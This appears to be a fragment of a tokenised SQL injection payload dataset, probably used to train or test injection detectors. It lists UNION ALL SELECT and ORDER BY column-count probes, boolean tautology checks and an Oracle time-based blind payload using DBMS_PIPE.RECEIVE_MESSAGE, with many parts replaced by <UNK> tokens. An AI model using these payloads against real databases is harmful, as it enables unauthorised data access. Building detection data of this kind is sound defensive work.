1 <UNK> <UNK> " LIKE " <UNK>
1 '|| ( SELECT ' <UNK> <UNK> ' / ( ) )
<UNK> ' ) WHERE <UNK> = <UNK> UNION ALL SELECT <UNK> , <UNK> #
1 % ' ) UNION ALL SELECT NULL , NULL , NULL , NULL --
1 % " UNION ALL SELECT NULL , NULL , NULL , NULL , NULL , NULL , NULL , NULL , NULL --
1 <UNK> <UNK> ' = ' <UNK>
1 <UNK> <UNK> ' = ' <UNK>
1 ) ) UNION ALL SELECT NULL , NULL , NULL#
1 <UNK> <UNK> " = " <UNK>
1 ' OR 2633 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 112 ) ||CHR ( 65 ) ||CHR ( 65 ) ||CHR ( 103 ) ,5 ) AND ' % ' = '
<UNK> ' ) ) AS <UNK> WHERE <UNK> = <UNK> UNION ALL SELECT <UNK> , <UNK> , <UNK> , <UNK> #
1 ' ) ORDER BY 1 <@
<UNK> ) ORDER BY 1 --
1 ) ) AS <UNK> WHERE <UNK> = <UNK>
<UNK> ' ) ) AS <UNK> WHERE <UNK> = <UNK> UNION ALL SELECT <UNK> , <UNK> , <UNK> , <UNK> #
1 <UNK> <UNK> " LIKE " <UNK>
<UNK> ) ) UNION ALL SELECT <UNK> , <UNK> #
1 % " ) UNION ALL SELECT NULL , NULL#
1 <UNK> <UNK> ' LIKE ' <UNK>
1 % ' ) UNION ALL SELECT NULL , NULL#
